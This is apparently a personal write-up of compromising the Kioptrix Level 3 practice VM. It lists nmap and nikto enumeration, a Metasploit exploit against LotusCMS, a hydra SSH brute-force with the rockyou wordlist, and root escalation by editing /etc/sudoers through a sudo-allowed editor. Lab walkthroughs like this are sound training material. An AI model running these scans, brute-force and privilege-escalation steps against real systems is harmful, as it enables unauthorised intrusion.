So going back to poping these vulnerable VMs onto Kioptirx level 3
Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/?p=358
Vulnhub: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
🔥HOST DISCOVERY🔥
ARP
arp-scan -l
ping
ping 192.168.0.20
The box is up and responding
🔥PORT SCANNING🔥
TCP
nmap -sS -A -sC -sV -O -p0- 192.168.0.20 -oA nmap_tcp_full_ver_sV
UDP
nmap -sU -n 192.168.0.20 -oA nmap_udp_def
hmmm nothing for UDP then
🔥SERVICE ENUMERATION 🔥
22 - ssh
ssh 192.168.0.20
80 - http
Has a login page
http://192.168.0.20/index.php?system=Admin
we enumerate the platform LotusCMS
nikto -h 192.168.0.20
A few more bits found with nikto
http://192.168.0.20/phpmyadmin/
phpmyadmin - 2.11.3.0
🔥EXPLOITATION🔥
Looking through metasploit we find a likely exploit
exploit/multi/http/lcms_php_exec
Execution of the exploit gives us a shell with www-data permissions
🔥PRIV ESCULATION🔥
Looking around the file system
I found the user loneferret so decided to try bruteforce SSH using hydra. More on this later
Gconfig.php has mysql creds stored in clear-text which will be useful..
Checking back on my bruteforcing a little later we have a hit
hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt ssh -t 4
Now SSH'd in as loneferret:starwars
sudo ht
gives us an error but using google fu we find a quickfix
https://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color
Once we get it working we are faced with this screen.
After fighting with the gui and figuring out how to use this I open /etc/sudoers using alt+f
I added , /bin/sh to the end so we can bump to root.
Try again
got root 😎😎😎
